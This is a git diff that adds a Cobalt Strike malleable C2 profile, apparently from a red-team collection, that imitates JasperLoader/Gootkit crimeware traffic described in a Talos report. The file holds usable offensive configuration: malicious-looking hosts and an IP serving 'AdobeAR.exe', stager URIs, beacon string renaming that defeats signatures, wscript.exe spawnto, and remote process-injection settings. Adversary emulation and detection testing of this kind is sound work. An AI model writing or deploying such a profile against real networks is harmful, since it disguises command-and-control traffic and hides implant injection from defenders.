diff --git a/crimeware/jasperloader.profile b/crimeware/jasperloader.profile
new file mode 100644
index 0000000..682d023
--- /dev/null
+++ b/crimeware/jasperloader.profile
@@ -0,0 +1,223 @@
+#jasperloader.profile
+#https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html
+#https://app.any.run/tasks/39e6bd26-b580-4335-89de-69483d745efb/
+#xx0hcd
+
+###global options###
+#sleeptime from report, image 'Figure 22: Stage 2 — JavaScript retrieval'
+set sleeptime "180000";
+set jitter    "33";
+set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38";
+
+set sample_name "jasperloader.profile";
+
+http-get {
+
+    set uri "/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php";
+
+    set verb "GET";
+    
+    client {
+
+        header "Host" "cdn.zaczvk.pl";
+        header "Connection" "Keep-Alive";
+
+	   
+        metadata {
+            base64url;
+            parameter "vid";
+        }
+
+    }
+
+    server {
+        header "Server" "nginx/1.14.2";
+        header "Content-Type" "text/html; charset=UTF-8";
+        header "Connection" "keep-alive";
+        header "X-Powered-By" "PHP/5.4.16";
+       
+        output {
+
+            netbios;
+            	     
+	    prepend "\nfiuyc= \"";
+
+	    append "\";\n";
+            append "xfbjixjsytvxjyuvcaxhfehv = new Array();\n";
+	    append "xfbjixjsytvxjyuvcaxhfehv.push(\"i95BtfTT\")\n";
+	    append "xfbjixjsytvxjyuvcaxhfehv.push(\"C(\")\n";
+	    append "xfbjixjsytvxjyuvcaxhfehv.push(\"wVC3Ea\")\n";
+	    append "xfbjixjsytvxjyuvcaxhfehv.push(\"93V6x46z\")\n";
+	    append "xfbjixjsytvxjyuvcaxhfehv.push(\"9E7txtA6tRS3>SzSt4w\")\n";
+	    append "xfbjixjsytvxjyuvcaxhfehv.push(\"Bv9\")\n";
+	    append "xfbjixjsytvxjyuvcaxhfehv.push(\"xta7\")\n";
+	    append "xfbjixjsytvxjyuvcaxhfehv.push(\"49\")\n";
+
+            print;
+        }
+    }
+}
+
+http-post {
+    
+    set uri "/";
+    set verb "GET";
+    #set verb "POST";
+
+    client {
+
+
+	header "Host" "space.bajamelide.ch";
+	header "Connection" "Keep-Alive";     
+        
+        output {
+            base64url; 
+	    parameter "b";
+        }
+
+        id {
+	    base64url;
+	    parameter "v";
+          
+        }
+    parameter "psver" "5";
+    }
+
+    server {
+        header "Server" "nginx/1.14.2";
+        header "Content-Type" "text/html; charset=UTF-8";
+        header "Content-Length" "89";
+        header "Connection" "keep-alive";
+        header "X-Powered-By" "PHP/5.4.16";
+
+        output {
+            netbios;	    
+	   
+#	    prepend "\n";
+            prepend "d|http://31.214.157.69/";
+
+	    append "|AdobeAR.exe|http://cdn.zaczvk.pl/moddownloadok.php";
+            print;
+        }
+    }
+}
+
+http-stager {
+
+    set uri_x86 "/501";
+    set uri_x64 "/502";
+
+    client {
+        header "Host" "cloud.diminishedvaluecalifornia.com";
+        header "Connection" "Keep-Alive";
+
+        parameter "dwgvhgc" "";
+    }
+
+    server {
+        header "Server" "Apache/2.2.15 (CentOS)";
+        header "Last-Modified" "Tue, 22 Jan 2019 16:31:28 GMT";
+        header "ETag" "9f688-4-5800e82560818";
+        header "Accept-Ranges" "bytes";
+        header "Content-Length" "4";
+        header "Connection" "close";
+        header "Content-Type" "text/html; charset=UTF-8";
+    
+        output{
+            prepend "500\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+            print;
+        }
+
+    }
+
+
+}
+
+
+
+
+###Malleable PE Options###
+
+post-ex {
+
+    set spawnto_x86 "%windir%\\syswow64\\wscript.exe";
+    set spawnto_x64 "%windir%\\sysnative\\wscript.exe";
+
+    set obfuscate "false";
+
+    set smartinject "false";
+
+    set amsi_disable "false";
+
+}
+
+#used peclone on sample from 2nd stage gootkit using same domains, https://app.any.run/tasks/39e6bd26-b580-4335-89de-69483d745efb/
+stage {
+    set checksum        "0";
+    set compile_time    "15 Apr 2015 01:24:00";
+    set entry_point     "8208";
+    set image_size_x86  "2560000";
+    set image_size_x64  "2560000";
+    #set name	        "";
+    set userwx 	        "false";
+    set cleanup	        "false";
+    set sleep_mask	"false";
+    set stomppe         "false";
+    set obfuscate       "false";
+    set rich_header     "";
+    
+    set sleep_mask "false";
+
+#    set module_x86 "";
+#    set module_x64 "";
+
+    transform-x86 {
+        prepend "\x90\x90\x90";
+        strrep "ReflectiveLoader" "6ayBRVW";
+        strrep "beacon.dll" "uVRWRut";
+        }
+
+    transform-x64 {
+        prepend "\x90\x90\x90";
+        strrep "ReflectiveLoader" "6ayBRVW";
+        strrep "beacon.x64.dll" "uVRWRut";
+        }
+
+#can set a string in the .rdata section of the beacon dll.
+    #adds a zero-terminated string
+    #string "something";
+
+    #adds a string 'as-is'
+    #data "something";
+
+    #adds a wide (UTF-16LE encoded) string
+    stringw "IMAGE_SCN_MEM_READ"; 
+}
+
+
+#controls process injection behavior
+process-inject {
+
+    set allocator "NtMapViewOfSection";		
+
+    set min_alloc "16700";
+
+    set userwx "false";  
+    
+    set startrwx "true";
+        
+    transform-x86 {
+        prepend "\x90\x90\x90";
+    }
+    transform-x64 {
+        prepend "\x90\x90\x90";
+    }
+
+    execute {
+        CreateThread "ntdll!RtlUserThreadStart";
+        CreateThread;
+        NtQueueApcThread;
+        CreateRemoteThread;
+        RtlCreateUserThread;
+    }
+}